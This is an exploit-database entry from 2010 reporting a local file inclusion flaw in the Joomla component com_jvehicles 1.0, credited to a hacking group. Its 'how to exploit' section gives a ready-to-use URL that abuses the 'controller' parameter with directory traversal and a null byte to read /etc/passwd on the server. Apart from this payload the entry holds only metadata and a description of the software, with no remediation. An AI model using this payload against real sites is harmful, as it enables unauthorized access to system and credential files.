Joomla Component com_jvehicles Local File Inclusion

2010-04-01T00:00:00
ID 1337DAY-ID-11560
Type zdt
Reporter Chip D3 Bi0s
Modified 2010-04-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===================================================
Joomla Component com_jvehicles Local File Inclusion
===================================================

---------------------------------------------------------------------------------
Joomla Component Jvehicles Local File Inclusion
---------------------------------------------------------------------------------
 
Author      : Chip D3 Bi0s
Group       : LatinHackTeam
Email & msn : [email protected]
Date        : 31 March 2010
Critical Lvl    : Moderate
Impact      : Exposure of sensitive information
Where       : From Remote
---------------------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
Application : Jvehicles
version     : 1.0
Developer   : este8an
License     : GPL            type  : Non-Commercial
Date Added  : 5 May 2009
Download    : http://www.jvehicles.com/index.php?option=com_remository&Itemid=6&func=select&id=2&orderby=3〈=en
 
 
 
 
Description     :
 
Derivation of a popular component com_properties (for Estate Agent) .
This component is to manage vehicles. With the same functionality.
 
 
--------------
file error  : components/com_jvehicles/jvehicles.php
 
how to exploit
 
http://127.0.0.1/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00
 
------------------------
 
 
+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++





#  0day.today [2018-01-02]  #